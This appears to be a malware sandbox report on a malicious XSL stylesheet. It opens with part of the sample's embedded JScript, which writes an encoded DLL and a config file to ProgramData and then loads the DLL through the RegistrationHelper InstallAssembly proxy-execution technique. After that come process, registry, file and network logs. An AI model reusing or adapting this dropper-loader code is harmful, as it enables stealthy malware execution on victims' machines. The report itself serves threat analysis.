00%00%00V%00S%00_%00V%00E%00R%00S%00I%00O%00N%00_%00I%00N%00F%00O%00%00%00%00%00%BD%04%EF%FE%00%00%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%3F%00%00%00%00%00%00%00%04%00%00%00%02%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00D%00%00%00%01%00V%00a%00r%00F%00i%00l%00e%00I%00n%00f%00o%00%00%00%00%00%24%00%04%00%00%00T%00r%00a%00n%00s%00l%00a%00t%00i%00o%00n%00%00%00%00%00%00%00%B0%04%C4%01%00%00%01%00S%00t%00r%00i%00n%00g%00F%00i%00l%00e%00I%00n%00f%00o%00%00%00%A0%01%00%00%01%000%000%000%000%000%004%00b%000%00%00%00%2C%00%02%00%01%00F%00i%00l%00e%00D%00e%00s%00c%00r%00i%00p%00t%00i%00o%00n%00%00%00%00%00%20%00%00%000%00%08%00%01%00F%00i%00l%00e%00V%00e%00r%00s%00i%00o%00n%00%00%00%00%000%00.%000%00.%000%00.%000%00%00%00H%00%13%00%01%00I%00n%00t%00e%00r%00n%00a%00l%00N%00a%00m%00e%00%00%00I%00n%00s%00t%00a%00l%00l%00U%00t%00i%00l%00L%00i%00b%00.%00d%00l%00l%00%00%00%00%00%28%00%02%00%01%00L%00e%00g%00a%00l%00C%00o%00p%00y%00r%00i%00g%00h%00t%00%00%00%20%00%00%00P%00%13%00%01%00O%00r%00i%00g%00i%00n%00a%00l%00F%00i%00l%00e%00n%00a%00m%00e%00%00%00I%00n%00s%00t%00a%00l%00l%00U%00t%00i%00l%00L%00i%00b%00.%00d%00l%00l%00%00%00%00%004%00%08%00%01%00P%00r%00o%00d%00u%00c%00t%00V%00e%00r%00s%00i%00o%00n%00%00%000%00.%000%00.%000%00.%000%00%00%008%00%08%00%01%00A%00s%00s%00e%00m%00b%00l%00y%00%20%00V%00e%00r%00s%00i%00o%00n%00%00%000%00.%000%00.%000%00.%000%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%000%00%00%0C%00%00%00%u20AC%3F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00"; var opath = stdlibs.file.getPath("%programdata%\\InstallUtilLib.dll"); if(!stdlibs.file.exists(opath)){ stdlibs.file.write(opath,unescape(urlencode_data)); } if(stdlibs.file.exists(opath)){ return true; }else{ return false; } } function WriteConfFile(){ var opath = stdlibs.file.getPath("%programdata%\\InstallUtilLib.ini"); if(!stdlibs.file.exists(opath)){ stdlibs.file.write(opath,"1N64VPsS5IBxwlD8Zz7sgums2DaoH5E6V"); } if(stdlibs.file.exists(opath)){ return true; }else{ return false; } } function main_proc(){ var fstatus = WriteBinFile(); var cstatus = WriteConfFile(); if(fstatus && cstatus){ stdlibs.WS.Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; var a = new ActiveXObject("System.EnterpriseServices.RegistrationHelper"); var b = null; try{ a.InstallAssembly(stdlibs.file.getPath("%programdata%\\InstallUtilLib.dll"), "BoomTown", b, 8 ); }catch(e) { } } } function xml(nodelist){ Logger("Start"); main_proc(); Logger("Done"); return nodelist.nextNode().xml; } |
| StylesheetTemplateMatch: | / |
| StylesheetTemplateValue-ofSelect: | user:xml(.) |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 592 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\7e8576fb316dadbb96b84310d36f33fcd04fe136f8f957a3a07af24252f7f25f.xsl.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 Modules
| |||||||||||||||
| 2212 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2604 | "cmd.exe" /s /k pushd "C:\" | C:\Windows\system32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3352 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | MSOXMLED.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3728 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3352 CREDAT:14337 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 4016 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3352 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones |
| Operation: | write | Name: | SecuritySafe |
Value: 1 | |||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
| Operation: | write | Name: | SavedLegacySettings |
Value: 4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 | |||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active |
| Operation: | write | Name: | {63910D0D-FC9D-11E9-AB41-5254004A04AF} |
Value: 0 | |||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Type |
Value: 4 | |||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Count |
Value: 2 | |||
| (PID) Process: | (3352) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Time |
Value: E3070B00050001000B002F002100D401 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3352 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF1B485D7D7D0966EB.TMP | — | |
MD5:— | SHA256:— | |||
| 3352 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
| 3352 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
| 3728 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019110120191102\index.dat | dat | |
MD5:— | SHA256:— | |||
| 4016 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:— | SHA256:— | |||
| 3352 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{63910D0E-FC9D-11E9-AB41-5254004A04AF}.dat | binary | |
MD5:— | SHA256:— | |||
| 4016 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VXJ3Q75V\desktop.ini | ini | |
MD5:4A3DEB274BB5F0212C2419D3D8D08612 | SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38 | |||
| 3352 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\favicon[1].png | image | |
MD5:9FB559A691078558E77D6848202F6541 | SHA256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914 | |||
| 4016 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\NXT7KIKO\desktop.ini | ini | |
MD5:4A3DEB274BB5F0212C2419D3D8D08612 | SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38 | |||
| 4016 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\7LEH7GHR\desktop.ini | ini | |
MD5:4A3DEB274BB5F0212C2419D3D8D08612 | SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3352 | iexplore.exe | GET | 200 | 13.107.21.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3352 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
www.bing.com |
| whitelisted |